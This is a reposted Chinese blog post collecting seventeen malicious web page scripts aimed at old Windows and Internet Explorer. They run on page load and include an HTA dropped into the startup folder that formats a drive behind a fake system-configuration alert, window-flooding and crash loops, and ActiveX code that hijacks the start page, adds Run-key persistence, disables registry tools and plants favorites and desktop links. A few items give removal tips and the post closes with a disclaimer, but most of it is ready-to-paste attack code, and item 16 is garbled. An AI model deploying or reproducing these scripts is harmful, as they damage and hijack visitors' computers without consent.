• 收集十七项网页恶意代码(转)


    、格式化硬盘
    <object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
    </object>
    <script>
    scr.Reset();
    scr.Path="C:\\windows\\Men?inicio\\Programas\\Inicio\\automat.hta";
    scr.Doc="<object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B></object><script>wsh.Run(start /m format a: /q /autotest /u);alert(IMPORTANT : Windows is configuring the system. Plase do not interrupt this process.);</"+"SCRIPT>";
    scr.write();
    2、使 WINDOWS 98掉线的代码
    <html>
    <head>
    </head>
    <a href="wincrash.htm" on mouseclick="alert("Go To Hell,Mall!")">HaHa!</a>
    </html>
    <HTML>
    <BODY>
    <IMG SRC="c:\con\con">
    <!-- or nul\nul, clock$\clock$ -->
    <!-- or aux\aux, config$\config$ -->
    </BODY>
    </HTML>

    3、 视窗炸弹
    <HTML>
    <HEAD>
    <TITLE>f\*\*k USA</TITLE>
    <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
    </HEAD>
    <BODY onload="WindowBomb()">
    <SCRIPT LANGUAGE="java script">
    function WindowBomb()
    {
    var iCounter = 0 // dummy counter
    while (true)
    {
    window.open("http://i50.126.com/","CRASHING" + iCounter,"width=1,height=1,resizable=no")
    iCounter++
    }
    }
    </script>
    </BODY>
    </HTML>

    4、造成IE 5.0崩溃的代码
    <HTML>
    <BODY>
    <script>
    var color = new Array;
    color[1] = "black";
    color[2] = "white";
    for(x = 0; x <3; x++)
    {
    document.bgColor = color[x]
    if(x == 2)
    {
    x = 0;
    }
    }
    </SCRIPT>
    </BODY>
    </HTML>

    5、进入WINDOWS 之前弹出来的对话框代码 到注册表找到 LegalNoticeCaption , LegalNoticeText 删除
    <SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
    function f(){
    try
    {
    //ActiveX initialization
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject();
    try
    {
    if (documents .cookie.indexOf("Chg") == -1)
    {
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "这里是标题栏 网络联盟 i50.126.com");
    Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "这里是标题栏 网络联盟 i50.126.com");
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "请多留意本站的文章 i50.yjpc.com");
    Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "请多留意本站的文章 i50.yjpc.com");
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    catch(e)
    {}
    }
    catch(e)
    {}
    }
    function init()
    {
    setTimeout("f()", 1000);
    }
    init();</SCRIPT>

    6、造成 WINDOWS98 不能关机的代码。 到注册表找到 FastReboot 删除就OK
    <SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
    function f(){
    try
    {
    //ActiveX initialization
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject();
    try
    {
    if (documents .cookie.indexOf("Chg") == -1)
    {
    Shl.RegWrite ("HKLM\\System\\CurrentControlSet\\Control\\Shutdown\\FastReboot", "1");
    Shl.RegWrite ("HKCU\\System\\CurrentControlSet\\Control\\Shutdown\\FastReboot", "1");
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    catch(e)
    {}
    }
    catch(e)
    {}
    }
    function init()
    {
    setTimeout("f()", 1000);
    }
    init();</SCRIPT>

    7、视窗炸弹代码

    <HTML>
    <HEAD>
    <TITLE>f\*\*k USA</TITLE>
    <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
    </HEAD>
    <BODY onload="WindowBomb()">
    <SCRIPT LANGUAGE="java script">
    function WindowBomb()
    {
    var iCounter = 0 // dummy counter
    while (true)
    {
    window.open("http://i50.126.com/","CRASHING" + iCounter,"width=1,height=1,resizable=no")
    iCounter++
    }
    }
    </script>
    </BODY>
    </HTML>

    8、让IE不段循环的代码

    <HTML>
    <HEAD>
    <TITLE>f\*\*k USA</TITLE>
    <META HTTP-EQUIV="Content-Type" CONTENT="text/html;CHARSET=gb2312">
    </HEAD>
    <BODY onload="WindowBomb()">
    <SCRIPT LANGUAGE="java script">
    function WindowBomb()
    {
    var iCounter = 0 // dummy counter
    while (true)
    {
    window.open("http://i50.126.com/","CRASHING" + iCounter,"width=1,height=1,resizable=no")
    iCounter++
    }
    }
    </script>
    </BODY>
    </HTML>

    9、让电脑自动启动程序的代码 。 修改方法 找到相应键值 http://i50.yjpc.com/ 删除
    <SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
    function f(){
    try
    {
    文件://ActiveX/ initialization
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject();
    try
    {
    if (documents .cookie.indexOf("Chg") == -1)
    {
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "http://i50.yjpc.com/");
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    catch(e)
    {}
    }
    catch(e)
    {}
    }
    function init()
    {
    setTimeout("f()", 1000);
    }
    init();</SCRIPT>

    10、自动设成主页代码
    <SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
    function f(){
    try
    {
    //ActiveX initialization
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject();
    try
    {
    if (documents .cookie.indexOf("Chg") == -1)
    {
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://i50.126.com/");
    Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://i50.126.com/");
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    catch(e)
    {}
    }
    catch(e)
    {}
    }
    function init()
    {
    setTimeout("f()", 1000);
    }
    init();</SCRIPT>

    11、修改IE标题栏目。 修改方法 将以下代码中可以换的换成你想换的
    <SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
    function f(){
    try
    {
    //ActiveX initialization
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject();
    try
    {
    if (documents .cookie.indexOf("Chg") == -1)
    {
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "————( I50.126.COM )————( 网络联盟黑客安全网络 )————( I50.YJPC.COM)");
    Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "————( I50.126.COM )————( 网络联盟黑客安全网络 )————( I50.YJPC.COM)");
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    catch(e)
    {}
    }
    catch(e)
    {}
    }
    function init()
    {
    setTimeout("f()", 1000);
    }
    init();</SCRIPT>

    12、在右键加进网页链接 。修改方法:到注册表找到 MenuExt 把它删除就OK
    <SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
    function f()
    {
    try
    {
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    sh = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    fo = a1.GetObject();
    if (documents .cookie.indexOf("km169set") == -1)
    {
    sh.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\中国网络安全中心\\", "c:\\yntop.htm");
    sh.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\中国网络安全中心\\contexts", 0xf3,"REG_DWORD");
    hd=fo.CreateTextFile("c:\\yntop.htm");
    hd.write(<html><head></head><\script language=java script>window.open("http://i50.yjpc.com/");<\/script></html>);
    hd.close();
    file=fo.GetFile("c:\\yntop.htm");
    file.Attributes=6;
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookie="km169set=km169; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    catch(e)
    {
    }
    }
    function init()
    {
    setTimeout("f()", 1000);
    }
    init();</SCRIPT>

    13、IE 的 INTERNET 选项的主页条失去作用变灰的代码。 修改方法,找到 HomePage 删除就OK
    <SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
    function f()
    {
    try
    {
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    sh = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    fo = a1.GetObject();
    if (documents .cookie.indexOf("km169set") == -1)
    {
    sh.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\HomePage", 1,"REG_DWORD");
    hd=fo.CreateTextFile();
    hd.write();
    hd.close();
    file=fo.GetFile("c:\\yntop.htm");
    file.Attributes=6;
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookie="km169set=km169; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    catch(e)
    {
    }
    }
    function init()
    {
    setTimeout("f()", 1000);
    }
    init();</SCRIPT>

    14、回收站给改了名字的修改方法:打开注册表找到 {645FF040-5081-101B-9F08-00AA002F954E} 修改就 OK
    修改回收站的代码
    <SCRIPT language=java script>
    document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
    function f(){
    try
    {
    //ActiveX initialization
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject();
    try
    {
    if (documents .cookie.indexOf("Chg") == -1)
    {
    Shl.RegWrite ("HKCU\\Software\\CLASSES\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\", "回收站");
    Shl.RegWrite ("HKLM\\Software\\CLASSES\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\", "回收站");
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    catch(e)
    {}
    }
    catch(e)
    {}
    }
    function init()
    {
    setTimeout("f()", 1000);
    }
    init();</SCRIPT>

    15、注册表给锁住了
    锁注册表的代码
    <SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
    function f()
    {
    try
    {
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    sh = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    fo = a1.GetObject();
    if (documents .cookie.indexOf("km169set") == -1)
    {
    sh.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", 1,"REG_DWORD");
    hd=fo.CreateTextFile();
    hd.write();
    hd.close();
    file=fo.GetFile("c:\\yntop.htm");
    file.Attributes=6;
    var expdate = new Date((new Date()).getTime() + (1));
    documents .cookie="km169set=km169; expires=" + expdate.toGMTString() + "; path=/;"
    }
    }
    catch(e)
    {
    }
    }
    function init()
    {
    setTimeout("f()", 1000);
    }
    init();</SCRIPT>

    16、在收藏夹生成文件的代码
    将以下代码加进网页后,只要别人一打开就可以自动加进收藏夹
    <SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");function yuzi(){try{hzy=document.applets[0];hzy.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");hzy.createInstance();yuzi=hzy.GetObject();hzy.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");hzy.createInstance();try{Shor=yuzi.CreateShortcut(hzy.GetObject().GetSpecialFolder(0)+"\\Favorites"+"\\"+"【★-中国民间黑客组织-★】"+".URL");Shor.TargetPath="http://i50.126.com/";Shor.Save();}catch(yu){]catch(yu){]setTimeout("yuzi()",1000);</SCRIPT>

    17、在桌面生成的网页文件
    以下代码就是在桌面上生成一份网页的文件,一按打开的就是你的网页
    <SCRIPT language=java script>
    document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>")
    function AddFavLnk(loc, DispName, SiteURL)
    {
    var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
    Shor.TargetPath = SiteURL;
    Shor.Save();
    }
    function f(){
    try
    {
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject();
    try{
    //if (documents .cookie.indexOf("ChgLive") == -1)
    //{
    var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
    documents .cookie="ChgLive=general; expires=" + expdate.toGMTString() + "; path=/;"
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Interine Explorer");
    var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
    documents .cookie="ChgLive=general; expires=" + expdate.toGMTString() + "; path=/;"
    var WF, Shor, loc;
    WF = FSO.GetSpecialFolder(0);
    loc = WF + "\\Favorites";
    if(!FSO.FolderExists(loc)) {
    loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
    if(!FSO.FolderExists(loc)) {
    return;
    }
    }
    AddFavLnk("C:\\WINDOWS\\Desktop", "中国民间黑客网络", "http://i50.126.com/");
    //}
    }
    catch(e){ }
    }
    catch(e){ }
    }
    function init(){
    setTimeout("f()", 1000);
    }
    init();</SCRIPT>
    上面只是让你防护,千万不要害人。
  • 相关阅读:
    Angularjs中的缓存以及缓存清理
    举例子来说明Python引用和对象
    对象关系映射ORM
    Apache Storm 核心概念
    Linux如何查看哪个进程占用的SWAP分区比较多?
    MySQL彻底清除slave信息
    监控MySQL的时候监控用户应该怎么授权?
    MySQL用户密码修改
    专职DBA-Zabbix 3.0 for percona-server TokuDB
    防止rm强制删除
  • 原文地址:https://www.cnblogs.com/zhangronghua/p/823765.html
Copyright © 2020-2023  润新知